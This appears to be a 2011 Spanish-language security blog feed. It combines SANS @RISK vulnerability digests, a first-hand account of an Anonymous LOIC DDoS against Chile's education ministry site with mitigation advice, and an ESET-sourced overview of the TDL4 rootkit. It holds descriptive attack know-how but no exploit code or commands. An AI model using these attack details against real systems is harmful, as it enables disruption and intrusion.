Description: Wireshark (formerly Ethereal) is an application for analyzing network traffic. The application is exposed to a denial of service issue because it fails to properly handle specially crafted packets. Specifically, the issue affects the Lucent/Ascend file parser when parsing specially crafted packets. Wireshark versions 1.2.0 through 1.2.17, versions 1.4.0 through 1.4.7 and version 1.6.0 are affected.
Ref: http://www.wireshark.org/security/wnpa-sec-2011-09.html
______________________________________________________________________

11.28.13 CVE: Not Available
Platform: Cross Platform
Title: SAP Netweaver Insecure SAPTerm User Account Creation Security Bypass Vulnerability
Description: SAP NetWeaver is an integration platform for enterprise applications. The application is exposed to a security bypass issue that can allow a user to create SAPTerm user accounts with hardcoded credentials. SAP Basis versions 620 through 640, SAP Basis versions 700 through 702, 710 through 730 and 72L through 800 are affected.
Ref: http://www.securityfocus.com/bid/48509/info
______________________________________________________________________

11.28.14 CVE: Not Available
Platform: Cross Platform
Title: IBM DB2 "DT_RPATH" Insecure Library Loading Arbitrary Code Execution Vulnerability
Description: IBM DB2 is a database management application written for use on multiple platforms. The application is exposed to an issue because the "/opt/ibm/db2/V9.7/itma/tmaitm6/lx8266/bin/kbbacf1" binary (installed with root privileges) includes the current working directory
(".") in the "DT_RPATH" (runtime library search path) of the ELF (Executable and Linking Format) header. IBM DB2 9.7 is vulnerable and other versions may also be affected.
Ref: http://www.securityfocus.com/bid/48514/info
______________________________________________________________________

11.28.15 CVE: CVE-2011-1898
Platform: Cross Platform
Title: Multiple Virtualization Applications Intel VT-d chipsets Local Privilege Escalation Vulnerability
Description: Multiple Virtualization applications using Intel VT-d chipsets are exposed to a privilege escalation issue that occurs when interrupt remapping is not enabled in the chipsets.
Specifically, this occurs because the affected chipsets fail to prevent a guest which owns a PCI device from using DMA. An attacker-controlled PCI device can exploit this to generate MSI interrupts by writing to the interrupt injection registers. Xen and KVM are vulnerable and other Virtualization applications may also be affected.
Ref: http://www.securityfocus.com/bid/48515/info
______________________________________________________________________

11.28.16 CVE: Not Available
Platform: Cross Platform
Title: IBM InfoSphere Information Server Multiple Local Privilege Escalation Vulnerabilities
Description: The IBM InfoSphere Information Server is an enterprise platform for data integration. The application is exposed to multiple local privilege escalation issues. Specifically, these issues occur because insecure file permissions and ownership settings may be applied to "ds.rc" and "dsenv" files within the DSEngine directory.
IBM InfoSphere Information Server versions 8.5 and 8.5.0.1 are affected.
Ref: https://www-304.ibm.com/support/docview.wss?uid=swg21504279
______________________________________________________________________

11.28.17 CVE: CVE-2011-1223,CVE-2011-1222
Platform: Cross Platform
Title: IBM Tivoli Storage Manager Client Multiple Buffer Overflow
Description: IBM Tivoli Storage Manager is an application for running automated backup and recovery of data. The application is exposed to multiple buffer overflow issues. A buffer overflow issue affects the Journal Based Backup function. A buffer overflow issue affects the Alternate Data Streams processing function.
IBM Tivoli Storage Manager 6.2.0.0 through 6.2.1.3, 6.1.0.0 through 6.1.3.1, 5.5.0.0 through 5.5.2.10 and 5.4.0.0 through 5.4.3.3 are affected.
Ref: http://www.securityfocus.com/bid/48519/discuss
______________________________________________________________________

11.28.18 CVE: Not Available
Platform: Cross Platform
Title: Vsftpd Compromised Source Packages Backdoor Vulnerability
Description: Vsftpd (Very Secure File Transfer Protocol daemon) is a secure FTP server for Linux, UNIX and similar operating systems.
The application is exposed to a backdoor issue because the "vsftpd-2.3.4.tar.gz" source package file contains a backdoor.
The Vsftpd 2.3.4 source package is affected.
Ref: http://www.securityfocus.com/bid/48539/discuss
______________________________________________________________________

11.28.19 CVE: CVE-2011-2465
Platform: Cross Platform
Title: ISC BIND 9 RPZ Configurations Remote Denial of Service
Description: ISC BIND (Berkley Internet Name Domain) is an implementation of the Domain Name System protocols. The application is exposed to multiple remote denial of service issues.
These issues affect servers with recursion enabled and configured with the Response Policy Zones (RPZ) feature. Specifically, the issues are triggered when processing certain RPZ rule/action patterns, which contain specially crafted DNAME and CNAME records. ISC BIND versions prior to 9.8.0-P4 are vulnerable. (Note that 9.8.0-P3 is not affected but has been replaced by 9.8.0-P4).
Ref: https://www.isc.org/software/bind/advisories/cve-2011-2465
______________________________________________________________________

11.28.20 CVE:
CVE-2011-2633,CVE-2011-2632,CVE-2011-2631,CVE-2011-2630,CVE-2011-2629
Platform: Cross Platform
Title: Opera Web Browser Multiple Remote Denial of Service Vulnerabilities
Description: Opera is a Web browser application. The application is exposed to multiple issues. A denial of service issue occurs when handling unknown content on certain web sites, as was demonstrated on "www.falk.de". A denial of service issue occurs when a popup page of the "Easy Sticky Note" extension is reloaded. A denial of service issue occurs because of an infinite loop when processing the "column-count" Cascading Style Sheet property, as was demonstrated on an unspecified Wikipedia page. A denial of service issue occurs because the browser fails to properly deconstruct certain Silverlight instances, as was demonstrated on "vod.onet.pl". A denial of service issue occurs when processing a certain Certificate Revocation List file, as was demonstrated by the "multicert-ca-02.crl" file. Versions prior to Opera Web Browser 11.11 are affected.
Ref: http://www.opera.com/docs/changelogs/windows/1111/
http://www.opera.com/docs/changelogs/unix/1111/
http://www.opera.com/docs/changelogs/mac/1111/
______________________________________________________________________

11.28.21 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: WebCalendar Multiple Cross-Site Scripting Vulnerabilities
Description: WebCalendar is a PHP-based application. The application is exposed to multiple cross-site scripting issues because it fails to properly sanitize user-supplied input to multiple scripts and parameters. WebCalendar 1.2.3 is vulnerable; other versions may also be affected.
Ref: http://www.securityfocus.com/bid/48546/info
______________________________________________________________________

11.28.22 CVE: Not Available
Platform: Web Application - SQL Injection
Title: PhpFood "restaurant.php" SQL Injection Vulnerability
Description: phpFood is a content manager that tracks food orders.
PhpFood is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied input to the "id" parameter of the "restaurant.php" script before using it in an SQL query. phpFood 2.00 is vulnerable; other versions may also be affected.
Ref: http://www.securityfocus.com/bid/48552
______________________________________________________________________

11.28.23 CVE: Not Available
Platform: Web Application
Title: AeroMail Multiple Vulnerabilities
Description: Aeromail is an email application. The application is exposed to multiple remote issues. A cross-site scripting issue affects the "folder" URL variable. A cross-site request forgery affects the composition screen. A cross-site request forgery allows attackers to send spam email without a user knowing. An HTML injection issue occurs because the application fails to sanitize folder names. An HTML injection issue occurs because the application fails to sanitize the email attachment names. An HTML injection issue occurs because the application fails to sanitize the subject line before displaying emails.
AeroMail version 2.80 is vulnerable, other versions may also be affected.
Ref: http://www.securityfocus.com/bid/48510/discuss
______________________________________________________________________

11.28.24 CVE: Not Available
Platform: Web Application
Title: IBM Rational DOORS Multiple Unspecified Vulnerabilities
Description: IBM Rational DOORS is a Web application that works with IBM Rational DOORS databases. The application is exposed to multiple unspecified issues. An unspecified cross-site scripting issue exists. An unspecified issue affects "Server Error"
responses. An unspecified issue affects the application.
IBM Rational DOORS versions 1.4 through 1.4.0.3 are affected.
Ref: https://www-304.ibm.com/support/docview.wss?uid=swg27020404
______________________________________________________________________

11.28.25 CVE: Not Available
Platform: Web Application
Title: WeBid Local File Include and SQL Injection Vulnerabilities
Description: WeBid is a web-based application implemented in PHP. The application is exposed to multiple input validation issues. A local file include issue affects the "lan" and "USERLANGUAGE" parameters of the "includes/messages.inc.php" script. 2) Multiple SQL-injection issues affect the application. WeBid 1.0.2 is vulnerable and other versions may also be affected.
Ref: http://www.webidsupport.com/forums/showthread.php?3892
______________________________________________________________________

11.28.26 CVE: Not Available
Platform: Hardware
Title: Portech MV-372 VoIP Gateway Multiple Security Vulnerabilities
Description: The Portech MV-372 VoIP Gateway is a GSM/CDMA/UMTS mobile gateway device. The device is exposed to multiple issues. An information disclosure issue exists because the device displays information about the model type, module description, and firmware and codec versions without authentication. A denial of service issue occurs when passing an overly long string to the "password" field while connecting through a Telnet service. Multiple security bypass issues exist because the application allows the modification of configuration settings to occur without the provision of a valid username and password. All version of firmware are affected.
Ref: http://www.securityfocus.com/bid/48560
______________________________________________________________________

Anonymous Mineduc.cl TANGO DOWN !!!

noreply@blogger.com (Pablo Ramirez Hoffmann) — Fri, 08 Jul 2011 16:28:00 +0000

Comentarios: pramirezh[at]gmail_dot_com

Hola, después de varios días sin postear algo, trabajo trabajo trabajo, hoy estuve muy de cerca en el ataque organizado por Anonymous y la idea es poder describirles el modus operando de este DDoS realizado a MINEDUC, partiendo por la publicidad generada para la organización:

Después de esto estuve de forma activa en el canal IRC, los bot! No informaban nunca el target, todos los pedían y lo pedían, hasta que llegó la hora, 9:59 am GMT-4 y Colkra informaba del target:

Ahí comenzó el ataque con la herramienta LOIC, de la cual ya hablé en algún momento, después de eso, no pasaron más de 7 minutos cuando comenzó a caer el sitio:

Y no solamente el sitio de Mineduc, si no que varios otros sitios alojados en el mismo server:

Se notaba que los muchachos de seguridad (llamados *****) estaban tratando de hacer lo posible por mantener el sitio arriba, ya que el LOIC estaba comenzando a dar errores en algunos momentos:

Pero no, el sitio estaba lentísimo:

Al fin del día, de igual forma colapsó, y quizás las medidas de mitigación fueron correctas, pero no realizaron un sizing adecuado para soportar el DDoS de los pingüinos… me reía mucho en el canal de IRC, ya que decían, “Sigamos tirando piedrazos al servidor”…

Pero bueno… aparte de mostrar la noticia me gustaría contarles que ya están en práctica varias medidas de mitigación, tanto a nivel metodológico como a nivel técnico, y para ello partiré con la metodología (Solo el big picture, no en detalle, ya que me puede hacer ganar dinero J)

1. Preparación: Objetivo: Establecer contactos, definir los procedimientos, y recopilar información para ahorrar tiempo durante un ataque.

2. Identificación: Objetivo: Detectar el incidente, determinar su alcance, e involucrar a las partes apropiadas.

3. Contención: Objetivo: Mitigar los efectos del ataque sobre el medio ambiente de destino.

4. Remediación: Objetivo: Llevar a cabo acciones para detener la denegación de servicio.

5. Secuelas: Objetivo: Documentar detalles del incidente, analizar las lecciones aprendidas, y ajustar los planes y las defensas.

6. Recuperación: Objetivo: Volver el estado funcional anterior.

Este trabajo no es tarea de un día para otro, sino que requiere de una buena planificación estratégica y en un futuro espero poder escribir del workflow a seguir.

A nivel técnico existen variadas opciones, y muchos sabores de fabricantes, hoy solo plantearé las medidas cuando estamos en contra del tiempo.

1. Aislar el entorno objetivo, esto quiere decir sacar el web server de la DMZ y pasarlo a otro enlace para no afectar a toda la infraestructura y a nuestros enlaces principales… de gran ayuda es nuestro ISP para rutear todo ese tráfico a otro enlace y no tener que cambiar registros DNS, NAT, ETC.

2. Poner un Web Application Firewall para mitigar ataques que puedan provocar defaced, ya que en el canal de IRC a cada rato solicitan la modificación del sitio (Recomiendo IMPERVA)

3. Poner un IPS que detecte las peticiones de LOIC (TippingPoint lo hace), para así mitigar las conexiones concurrentes, y establecer umbrales de SYN Flood, recordemos que LOIC ataca por TCP, UDP y HTTP.

4. Poner un firewall con buena capacidad de conexiones concurrentes… cuando realicé una prueba con el LOIC, contra un web server sin protección, se detectaron 250 conexiones concurrentes, así que es cosa de dividir las conexiones concurrentes que soporta tu firewall, por las 250 que ya nombre, así tendrán una métrica de cuantos atacantes podrán soportar

5. Poner un Sniffer para capturar el ataque y en un futuro estudiarlo, les recomiendo un buen almacenamiento si el ataque dura varias horas

6. Poner el sitio web en modo texto, así las consultas al portal serán más pequeñas y no tendrán que cargar imágenes, flash y todas esas cosas pesadas

Por otra parte tenemos a un actor de Cloud, que últimamente se ha hecho famoso por su gran capacidad de procesamiento y comerse varios millones de zombis LOIC, estoy hablando del AKAMAI, un servicio de Anti DDoS, que si bien es cierto, es caro… para organizaciones que realizaron la metodología que presento, sabrán cual es el riesgo y las pérdidas que les puede traer este tipo de ataques.

Finalmente, les dejo algunos screen de TippingPoint, aunque no me gusta mucho hablar de marcas, pero funciona:

Vacunas Anti LOIC J

Detectando y deteniendo el ataque:

Espero poder postear pronto y muchas gracias por la gran cantidad de visitas en el Blog.

La evolución del BotNet

noreply@blogger.com (Pablo Ramirez Hoffmann) — Sat, 02 Jul 2011 16:24:00 +0000

Comentarios: pramirezh[at]gmail_dot_com

Como sabemos, cada cierto tiempo (cada vez menor) el nivel de sofisticación del malware aumenta. Nuevas técnicas y métodos de evasión y de propagación son desarrolladas por los creadores de malware día a día. Luego de que el famoso gusano Stuxnet fuera descubierto a mediados del año pasado y su complejo funcionamiento e intenciones fueron revelados, ningún otro malware mostró un nivel que se acercara a sus capacidades técnicas.

En esta oportunidad hablaremos del rootkit nombrado por sus creadores TDL4, también conocido como TDSS y detectado como Win32/Olmarik.

Los autores de este rootkit implementaron uno de los más avanzados y sofisticados mecanismos para saltear varias medidas preventivas y mecanismos de seguridad del sistema operativo. En la actualidad es la amenaza más compleja conocida.

Consta de varias versiones las cuales fueron variando en complejidad desde su aparición hace aproximadamente 2 años. TDL3, TDL2 y TDL1 son las versiones anteriores de esta amenaza. Aunque todas las versiones comparten características similares, TDL4 podría considerarse como una nueva clase de malware por sus capacidades mejoradas que detallaremos a continuación.

TDL4 es la primera versión diseñada para afectar equipos con sistema operativo de 64 bits como Windows Vista y Windows 7.

TDL4 tiene la habilidad de cargar su driver en sistemas que cuentan con protecciones que requieren firmas digitales de drivers (Versiones de 64 bits de Microsoft Vista y 7) y realiza hooks en el kernel de windows, aunque este tenga las protecciones contra el parcheo de kernel activadas.

Una de las mejoras sustanciales de TDL4 es la complejidad de su algoritmo de encriptación del protocolo utilizado para comunicación entre las máquinas infectadas y los centros de comando y control de la botnet. Los nombres de dominio a los cuales se conecta y un parámetro, ambos localizados en el archivo cfg.ini, son utilizados como llave de encriptación.

Una de sus características principales es la de modificar el MBR (Master Boot Record) lo que le permite ejecutar código con fines maliciosos antes que el sistema operativo, para permitirle entre otras cosas, tener acceso a un sistema de archivos oculto creado por el malware. Por esta razón también es llamado Bootkit.

En cuanto a números, esta amenaza posee más de 4 millones de equipos infectados a nivel mundial, lo que le permite por su número de computadoras infectadas y su complejidad ser una de las botnets más sofisticadas y poderosas en la actualidad.

TDL4 ha desplazado a Zeus y otras botnets, en el ranking de amenazas más complejas y peligrosas que existen hoy en día. Esto se debe no solo al número de equipos infectados sino a una de sus tantas características. TDL4 tiene la habilidad de detectar la presencia de otras botnets y removerlas quedando así como la única botnet con control del equipo. Otra característica muy interesante a nivel técnico de este malware es la habilidad de formar parte de una red descentralizada del tipo Peer to Peer (P2P), logrando así permanecer operativo aunque se den de baja alguno de sus servidores.

Fuente: ESET

Resumen de Vulnerabilidades - Semana 27

noreply@blogger.com (Pablo Ramirez Hoffmann) — Fri, 01 Jul 2011 13:48:00 +0000

_____________________________________________________________________

       @RISK: The Consensus Security Vulnerability Alert

                           Week 27 2011
_____________________________________________________________________

Summary of Updates and Vulnerabilities in this Consensus

Platform                        Number of Updates and Vulnerabilities

------------------------- -------------------------------------

Third Party Windows Apps 7 (#3)

Mac Os 1 (#1)

BSD 1

Novell 1

Cross Platform 10 (#2)

Web Application - SQL Injection 1

Web Application 4

Network Device 2

****************************************************************************

Part I -- Critical Vulnerabilities from TippingPoint (www.tippingpoint.com) Widely Deployed Software
(1) HIGH: Mac OS/X Multiple Security Vulnerabilities
(2) MEDIUM: Google Chrome Multiple Vulnerabilities
(3) MEDIUM: Citrix EdgeSight Launcher Service Heap buffer Overflow

*************************************************************************

Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys
(www.qualys.com)

-- Third Party Windows Apps
11.27.1 - Easewe FTP OCX ActiveX Control "EaseWeFtp.ocx" Multiple Insecure Method Vulnerabilities
11.27.2 - xAurora "RSRC32.DLL" DLL Loading Arbitrary Code Execution
11.27.3 - FreeAmp ".pls" File Buffer Overflow
11.27.4 - Winamp Multiple Remote Issues
11.27.5 - MySQLDriverCS SQL Injection
11.27.6 - Novell ZENworks Handheld Management "ZfHSrvr .exe" Se rvice Directory Traversal
11.27.7 - CygniCon CyViewer ActiveX Control "SaveData()" Insecure Method Vulnerability

-- Mac Os
11.27.8 - Apple Mac OS X Multiple Vulnerabilities

-- BSD
11.27.9 - tftp-hpa FTP Server "utimeout" Option Remote Buffer Overflow

-- Novell
11.27.10 - Novell File Reporter "NFRAgent.exe" Security Bypass

-- Cross Platform
11.27.11 - Torque "job name" Argument Remote Buffer Overflow
11.27.12 - Rampart "util/rampart_timestamp_token.c" Remote Security Bypass
11.27.13 - LibreOffice ".lwp" File Multiple Remote Stack Buffer Overflow Vulnerabilities
11.27.14 - Wireshark "bytes_repr_len()" NULL Pointer Dereference Denial of Service
11.27.15 - cURL/libcURL GSS/Negotiate Feature Spoofing Security Vulnerability
11.27.16 - Asterisk Multiple Remote Denial of Service Vulnerabilities
11.27.17 - Apache Tomcat "MemoryUserDatabase" Information Disclosure
11.27.18 - D-Bus Configuration Insecure Temporary File Creation Vulnerability
11.27.19 - Sybase Advantage Server "ADS" Process Off-By-One Buffer Overflow 11.27.20 - Google Chrome Multiple Security Vulnerabilities

-- Web Application - SQL Injection
11.27.21 - IdevSpot iSupport "x_category" Parameter SQL Injection

-- Web Application
11.27.22 - ActivDesk Multiple Cross-Site Scripting and SQL Injection Vulnerabilities
11.27.23 - Nodesforum "3rd_party_limits.php" Remote File Include Vulnerability
11.27.24 - Avactis Shopping Cart Security Bypass and HTML Injection Vulnerabilities
11.27.25 - phpMyAdmin "$_SESSION" Array Unauthorized Access Vulnerability

-- Network Device
11.27.26 - IBM Web Application Firewall Security Bypass
11.27.27 - H3C ER5100 Authentication Bypass Vulnerability ______________________________________________________________________

PART I Critical Vulnerabilities
Part I for this issue has been compiled by Josh Bronson at TippingPoint, a division of HP, as a by-product of that company's continuous effort to ensure that its intrusion prevention products effectively block exploits using known vulnerabilities. TippingPoint's analysis is complemented by input from a council of security managers from twelve large organizations who confidentially share with SANS the specific actions they have taken to protect their systems. A detailed description of the process may be found at http://www.sans.org/newsletters/risk/#process

*************************************************************

(1) HIGH: Mac OS/X Multiple Security Vulnerabilities
Affected:
Mac OS X prior to 10.6.8

Description: Apple has released patches for multiple vulnerabilites affecting products related to Mac OS/X. The issues include code-execution vulnerabilities in the following components: Apple Type Services (ATS), CoreFoundation, CoreGraphics, ImageIO, Internal Components for Unicode (ICU), QuickLook, QuickTime, and Samba. The Samba vulnerabilities require a connection to a share on the vulnerable server. Except for the vulnerabilities in the CoreFoundation and ICU libraries, which may provide many unknown vectors of attack, all of the other vulnerabilities require an attacker to entice a target to open a malicious file or view a malicious site in order to execute arbitrary code on the target's machine.

Status: vendor confirmed, updates available

References:
Vendor Site
http://www.apple.com

Apple Security Update
http://support.apple.com/kb/HT4723

SecurityFocus BugTraq IDs
http://www.securityfocus.com/bid/38562
http://www.securityfocus.com/bid/39013
http://www.securityfocus.com/bid/42599
http://www.securityfocus.com/bid/42646
http://www.securityfocus.com/bid/43212
http://www.securityfocus.com/bid/43676
http://www.securityfocus.com/bid/43819
http://www.securityfocus.com/bid/44794
http://www.securityfocus.com/bid/44884
http://www.securityfocus.com/bid/45164
http://www.securityfocus.com/bid/46264
http://www.securityfocus.com/bid/46597
http://www.securityfocus.com/bid/46734
http://www.securityfocus.com/bid/46768
http://www.securityfocus.com/bid/47668
http://www.securityfocus.com/bid/48415
http://www.securityfocus.com/bid/48416
http://www.securityfocus.com/bid/48418
http://www.securityfocus.com/bid/48419
http://www.securityfocus.com/bid/48420
http://www.securityfocus.com/bid/48422
http://www.securityfocus.com/bid/48426
http://www.securityfocus.com/bid/48427
http://www.securityfocus.com/bid/48429
http://www.securityfocus.com/bid/48430
http://www.securityfocus.com/bid/48436
http://www.securityfocus.com/bid/48437
http://www.securityfocus.com/bid/48439
http://www.securityfocus.com/bid/48440
http://www.securityfocus.com/bid/48442
http://www.securityfocus.com/bid/48443
http://www.securityfocus.com/bid/48444
http://www.securityfocus.com/bid/48445
http://www.securityfocus.com/bid/48447

*************************************************************

(2) MEDIUM: Google Chrome Multiple Vulnerabilities
Affected:
Google Chrome Prior to 12.0.742.112

Description: Google has released a patch for multiple security vulnerabilities affecting its Chrome web browser. Six vulnerabilities have been rated "High" severity by Google. They include two use-after-free vulnerabilities in SVG (scalar vector graphics), a memory corruption in CSS parsing, potential race conditions in the HTML parser, a "bad bounds check" in v8, and a use-after-free vulnerability in text selection. Chrome is designed to automatically update itself when connected to the internet. By enticing a target to view a malicious site, an attacker can exploit these vulnerabilities in order to execute arbitrary code on the target's machine.

Status: vendor confirmed, updates available

References:
Vendor Site
http://www.google.com
Google Stable Channel Updates
http://googlechromereleases.blogspot.com/2011/06/stable-channel-update_28.html
SecurityFocus BugTraq ID
http://www.securityfocus.com/bid/48479/

*************************************************************

(3) MEDIUM: Citrix EdgeSight Launcher Service Heap buffer Overflow
Affected:
Citrix EdgeSight for Activ Application Monitoring prior to 5.3 SP2 Citrix EdgeSight for Load Testing prior to 3.8.1

Description: Citrix has released a patch for its EdgeSight product addressing a security vulnerability. EdgeSight is designed to manage and monitor XenApp, Presentation Server, and XenDesktop. Together, these services are designed to centralize application delivery and monitor networks for problems. One component of the EdgeSight product, LauncherService.exe, listens by default on port 18747 and copies attacker-controlled data onto a fixed-length heap buffer. By sending a malicious request, an attacker can exploit this vulnerability in order to execute arbitra ry code on the target's machine with SYSTEM-level privileges.

Status: vendor confirmed, updates available

References: Vendor Site http://www.citrix.com Citrix Security Article
http://support.citrix.com/article/CTX129699 Zero Day Initiative Advisory http://www.zerodayinitiative.com/advisories/ZDI-11-226/ SecurityFocus BugTraq ID http://www.securityfocus.com/bid/48385

*************************************************************

Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys
(www.qualys.com)

This list is compiled by Qualys ( www.qualys.com ) as part of that company's ongoing effort to ensure its vulnerability management web service tests for all known vulnerabilities that can be scanned. As of this week Qualys scans for 11531 unique vulnerabilities. For this special SANS community listing, Qualys also includes vulnerabilities that cannot be scanned remotely.
______________________________________________________________________

11.27.1 CVE: Not Available
Platform: Third Party Windows Apps
Title: Easewe FTP OCX ActiveX Control "EaseWeFtp.ocx" Multiple Insecure Method Vulnerabilities
Description: Easewe FTP OCX ActiveX control is an FTP ActiveX component that provides standard FTP features. The ActiveX control
("EaseWeFtp.ocx") is exposed to multiple insecure method issues. The "Execute()" and "Run()" methods allow the execution of an arbitrary program through the "FilePath" argument. The "CreateLocalFile()" method allows for the creation of an arbitrary empty file. The "CreateLocalFolder()" method allows for the creation of an arbitrary directory. The "DeleteLocalFile()" method allows for the deletion of an arbitrary file. Easewe FTP ActiveX control version 4.5.0.9 is vulnerable; other versions may also be affected.
Ref: http://www.securityfocus.com/archive/1/518573
______________________________________________________________________

11.27.2 CVE: Not Available
Platform: Third Party Windows Apps
Title: xAurora "RSRC32.DLL" DLL Loading Arbitrary Code Execution
Description: xAurora is a web browser for Microsoft Windows. The application is exposed to an issue that lets attackers execute arbitrary code. The issue arises because the application searches for the "RSRC32.DLL" Dynamic Link Library file in the current working directory. The issue can be exploited by placing both a specially crafted library file and a file that is associated with the vulnerable application in an attacker controlled location. xAurora version 10.00 is affected.
Ref: http://www.securityfocus.com/bid/48432/discuss
______________________________________________________________________

11.27.3 CVE: Not Available
Platform: Third Party Windows Apps
Title: FreeAmp ".pls" File Buffer Overflow
Description: FreeAmp is an MP3 player available for Microsoft Windows.
FreeAmp is exposed to a buffer overflow issue because it fails to perform adequate checks on user supplied input. Specifically, this issue occurs when opening a specially crafted ".pls" file. FreeAmp
2.0.7 is vulnerable; other versions may also be affected.
Ref: http://www.securityfocus.com/bid/48433/discuss
______________________________________________________________________

11.27.4 CVE: Not Available
Platform: Third Party Windows Apps
Title: Winamp Multiple Remote Issues
Description: Nullsoft Winamp is a media player for Microsoft Windows.
Winamp is exposed to multiple memory corruption issues, multiple heap-based buffer overflow issues, and an integer overflow issue that affects the "nsvdec_vp6.dll" file when parsing screen dimensions.
Winamp 5.61 is vulnerable and other versions may also be affected.
Ref: http://www.securityfocus.com/bid/48457/discuss
______________________________________________________________________

11.27.5 CVE: Not Available
Platform: Third Party Windows Apps
Title: MySQLDriverCS SQL Injection
Description: MySQLDriverCS is a .NET compliant MySQL driver. The application is exposed to an SQL injection issue because it fails to properly sanitize user-supplied input. Specifically, this issue occurs in the function "BindParameters()" in the class "DirectStatement" of the "Statement.cs" file. MySQLDriverCS 4.0.1 and all the previous versions which support the parameterized query mechanism are vulnerable.
Ref: http://www.securityfocus.com/archive/1/518627
______________________________________________________________________

11.27.6 CVE: Not Available
Platform: Third Party Windows Apps
Title: Novell ZENworks Handheld Management "ZfHSrvr.exe" Service Directory Traversal
Description: Novell ZENworks Handheld Management is an application used to prevent stolen handheld devices from leaking sensitive information. The application is exposed to a directory traversal issue in the "ZfHSrvr.exe" service listening over port 2398 because it fails to sufficiently sanitize user-supplied input. ZENworks Handheld Management 7.0.2.61213 and prior are vulnerable.
Ref: http://www.securityfocus.com/archive/1/518625
______________________________________________________________________

11.27.7 CVE: Not Available
Platform: Third Party Windows Apps
Title: CygniCon CyViewer ActiveX Control "SaveData()" Insecure Method Vulnerability
Description: CygniCon CyViewer is an ActiveX object viewer. CygniCon CyViewer ActiveX control is exposed to an issue caused by an insecure method. This issue occurs because the "SaveData()" method in the "CyViewer.ocx" file can be exploited to overwrite arbitrary files on the affected computer. Ashampoo 3D CAD Professional 3 3.0.1 is vulnerable; other versions may also be affected.
Ref: http://www.securityfocus.com/bid/48483/discuss
______________________________________________________________________

11.27.8 CVE:
CVE-2011-0196,CVE-2011-0197,CVE-2011-0198,CVE-2011-0199,CVE-2011-0200,CVE-2011-0201,
CVE-2011-0202,CVE-2011-0203,CVE-2011-0204,CVE-2011-0205,CVE-2011-0206,CVE-2011-0207,
CVE-2011-0208,CVE-2011-0209,CVE-2011-0210,CVE-2011-0211,CVE-2011-0212,CVE-2011-0213,CVE-2011-1132
Platform: Mac Os
Title: Apple Mac OS X Multiple Vulnerabilities
Description: Apple Mac OS X is exposed to multiple security issues that have been addressed in Security Update 2011-004. The update addresses new issues that affect AirPort, App Store, ATS, Certificate Trust Policy, ColorSync, CoreFoundation, CoreGraphics, FTP Server, ImageIO, International Components for Unicode, MobileMe, QuickLook, QuickTime and servermgrd. Mac OS X versions prior to 10.6.8 are affected.
Ref:
http://lists.apple.com/archives/security-announce/2011/Jun/msg00000.html
______________________________________________________________________

11.27.9 CVE: CVE-2011-2199
Platform: BSD
Title: tftp-hpa FTP Server " utimeout" Option Remote Buffer Overflow
Description: tftp-hpa is an enhanced version of the BSD TFTP client and server. The application is exposed to a remote buffer overflow issue because it fails to perform adequate boundary checks on user-supplied data. This issue occurs when processing a request to set the "utimeout" option from clients. Versions prior to tftp-hpa 5.1 are vulnerable.
Ref: http://www.pre-cert.de/advisories/PRE-SA-2011-05.txt
______________________________________________________________________

11.27.10 CVE: Not Available
Platform: Novell
Title: Novell File Reporter "NFRAgent.exe" Security Bypass
Description: Novell File Reporter provides solutions for managing files on the system. The application is exposed to a security bypass issue. Specifically, "NFRAgent.exe" listening allows attackers to delete arbitrary files with SYSTEM privileges by sending a specially crafted string to the "PATH" value. Novell File Reporter 1.0.4.2 and prior are vulnerable; other versions may also be affected.
Ref: http://www.securityfocus.com/bid/48468/discuss
______________________________________________________________________

11.27.11 CVE: CVE-2011-2193
Platform: Cross Platform
Title: Torque "job name" Argument Remote Buffer Overflow
Description: Torque (Tera-scale Open source Resource and Queue manager) is a resource manager. The application is exposed to a remote buffer overflow issue due to a failure to properly bounds check user-supplied input. Specifically, the issue affects the "job name" argument.
Terascale Open-Source Resource and Queue Manager 2.x, 2.5.x, 3.x are affected.
Ref: http://www.securityfocus.com/bid/48374/discuss
______________________________________________________________________

11.27.12 CVE: CVE-2011-0730
Platform: Cross Platform
Title: Rampart "util/rampart_timestamp_token.c" Remote Security Bypass
Description: Rampart is a security module for Axis2. The application is exposed to a remote security bypass issue. This issue occurs because the application fails to calculate the expiration time of the security token. This will allow attackers to use an expired token to gain access to Axis2. Rampart 1.3.0 is vulnerable and other versions may also be affected.
Ref: http://www.securityfocus.com/bid/48386/discuss
______________________________________________________________________

11.27.13 CVE: Not Available
Platform: Cross Platform
Title: LibreOffice ".lwp" File Multiple Remote Stack Buffer Overflow Vulnerabilities
Description: LibreOffice is an open source suite for Windows, Macintosh and Linux that provides applications for document production and data processing. LibreOffice is exposed to multiple remote stack-based buffer overflow issues because it fails to perform adequate boundary checks on user-supplied input. Specifically, these issues occur while importing specially crafted Lotus Word Pro (".lwp") files because of an error in the import filters. LibreOffice 3.3.1 and
3.3.2 are vulnerable and prior versions may also be affected.
Ref: http://www.securityfocus.com/bid/48387/discuss
______________________________________________________________________

11.27.14 CVE: CVE-2011-1956
Platform: Cross Platform
Title: Wireshark "bytes_repr_len()" NULL Pointer Dereference Denial of Service
Description: Wireshark (formerly Ethereal) is an application for analyzing network traffic. The application is exposed to a remote denial of service issue caused by a NULL pointer dereference error in the TCP dissector. Specifically, the issue occurs in the "bytes_repr_len()" function when handling malformed TCP packets.
Wireshark version 1.4.5 is vulnerable.
Ref: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5837
______________________________________________________________________

11.27.15 CVE: CVE-2011-2192
Platform: Cross Platform
Title: cURL/libcURL GSS/Negotiate Feature Spoofing Security Vulnerability
Description: cURL is a utility for transferring files with URL syntax over a number of protocols. cURL/libcURL is exposed to an issue that may allow attackers to spoof the clients security credentials. This issue occurs because the application's GSS/Negotatie feature unconditionally performs credential delegation, which may allow attackers to gain access to the client's security credentials. This issue affects cURL/libcURL 7.10.6 through 7.21.6.
Ref: http://curl.haxx.se/docs/adv_20110623.html
______________________________________________________________________

11.27.16 CVE: CVE-2011-2535,CVE-2011-2529
Platform: Cross Platform
Title: Asterisk Multiple Remote Denial of Service Vulnerabilities
Description: Asterisk is an open-source PBX application available for multiple operating platforms. Asterisk is exposed multiple remote denial of service issues. Refer to reference for complete details.
Asterisk versions 1.4.x, 1.6.2.x and 1.8.x are affected.
Ref: http://downloads.asterisk.org/pub/security/AST-2011-008.html
http://downloads.asterisk.org/pub/security/AST-2011-009.html
http://downloads.asterisk.org/pub/security/AST-2011-010.html
______________________________________________________________________

